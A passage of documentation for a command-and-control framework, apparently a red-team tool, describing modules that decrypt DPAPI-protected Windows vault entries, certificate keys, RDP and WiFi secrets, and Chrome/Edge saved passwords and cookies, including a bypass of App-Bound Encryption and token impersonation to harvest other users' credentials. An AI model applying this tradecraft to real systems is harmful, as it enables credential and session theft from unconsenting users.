- Requires Local Admin / SYSTEM context
- MITRE ATT&CK: T1555.004
dpapi_vault¶
Decrypt Windows Credential Manager vault entries. The vault contains credentials saved by Windows components and applications (web credentials, Windows credentials, certificate-based credentials).
Task type: dpapi (method: vault)
OPSEC
- Reads vault files from
%LOCALAPPDATA%\Microsoft\Vault\ - Requires the user's DPAPI master key for decryption
- MITRE ATT&CK: T1555.004
dpapi_certkeys¶
Decrypt certificate private keys protected by DPAPI. These keys are stored in the user's certificate store and can be used for authentication, code signing, or encrypted communication.
Task type: dpapi (method: certkeys)
OPSEC
- Reads certificate key files from
%APPDATA%\Microsoft\Crypto\RSA\and%APPDATA%\Microsoft\Crypto\Keys\ - Requires the user's DPAPI master key for decryption
- MITRE ATT&CK: T1555.004
dpapi_triage¶
Run a full DPAPI triage -- extracts master keys and then decrypts all available DPAPI-protected credential types (RDP, WiFi, Vault, Certificate Keys) in a single operation.
Task type: dpapi (method: triage)
| Parameter | Type | Required | Default | Description |
|---|---|---|---|---|
domain | string | No | -- | Domain for backup key retrieval |
dc | string | No | -- | DC for backup key retrieval |
Example output:
=== Master Key Extraction ===
Found 3 master key files for SID S-1-5-21-...-1001
=== RDP Credentials ===
Target: TERMSRV/dc01.corp.local
Username: CORP\admin
Password: AdminP@ss123!
=== WiFi Passwords ===
SSID: CorpWiFi
Password: WiFiP@ss2024
=== Vault Credentials ===
Resource: https://intranet.corp.local
Username: jsmith
Password: Intr@net!
=== Certificate Keys ===
Subject: [email protected]
Key exported: RSA 2048-bit
Full DPAPI chain workflow
- Run
dpapi_triagefor a quick overview of all available secrets - If you have Domain Admin, run
dpapi_backupkeyfirst to get the domain backup key - With the backup key, you can decrypt master keys for any user in the domain
- Use individual commands (
dpapi_rdp,dpapi_wifi, etc.) for targeted extraction
Browser Credential Extraction¶
chromedump¶
Extract saved passwords and cookies from Google Chrome and Microsoft Edge (Chromium-based) browsers. Supports both legacy DPAPI key decryption and Chrome v20+ App-Bound Encryption via the IElevator COM interface.
How it works:
- Locates Chrome/Edge user data directories under
%LOCALAPPDATA% - Reads the
Local StateJSON file to extract the encrypted master key - Key decryption (dual approach):
- Chrome v20+ (App-Bound Encryption): Uses the
IElevatorCOM interface to decrypt the app-bound key through Chrome's elevation service. Falls back to DPAPI ifIElevatoris unavailable - Legacy (Chrome <v20): Decrypts the master key using DPAPI (
CryptUnprotectData)
- Chrome v20+ (App-Bound Encryption): Uses the
- Copies the
Login DataSQLite database to a temp file (avoids Chrome's lock) - Queries the
loginstable fororigin_url,username_value,password_value - Decrypts each password blob using AES-256-GCM with the master key
- Also extracts and decrypts cookies from the
Cookiesdatabase
Chrome v20 App-Bound Encryption
Starting with Chrome v127+, Google introduced App-Bound Encryption where the master key is encrypted to the Chrome application identity, not just the user's DPAPI context. This means CryptUnprotectData alone cannot decrypt the key. Stentor's chromedump uses the IElevator COM interface ({708860E0-F641-4611-8895-7D867DD3675B}) to decrypt through Chrome's own elevation service, then falls back to standard DPAPI for older Chrome versions. Both v10/v11 key formats and v20+ app-bound keys are supported.
Task type: chromedump
Dedicated endpoint: POST /api/v1/c2/beacons/:id/chromedump
Example output:
{
"passwords": [
{
"url": "https://mail.corp.local/owa",
"username": "[email protected]",
"password": "OutlookP@ss123",
"profile": "Default"
},
{
"url": "https://vpn.corp.local",
"username": "jsmith",
"password": "VPNAccess!",
"profile": "Default"
}
],
"cookies": [
{
"host": ".corp.local",
"name": "SessionID",
"value": "abc123...",
"expires": 13350000000000000,
"profile": "Default"
}
]
}
OPSEC
- Accesses Chrome user data directory (
%LOCALAPPDATA%\Google\Chrome\User Data\) - Reads and copies
Login DataSQLite database andLocal StateJSON file - Calls
CryptUnprotectDatato decrypt the master key (generates Event ID 16385 if DPAPI auditing is enabled) - Creates a temporary copy of the database file (
chromedump-*.dbin%TEMP%) - Runs in the beacon's process (no fork-and-run) -- use
steal_tokenfirst if the target user differs from the beacon user - MITRE ATT&CK: T1555.003 (Credentials from Password Stores: Credentials from Web Browsers)
Multi-user extraction
chromedump extracts credentials for the beacon's current user context. To harvest credentials from another user, use steal_token to impersonate that user's token first, then run chromedump.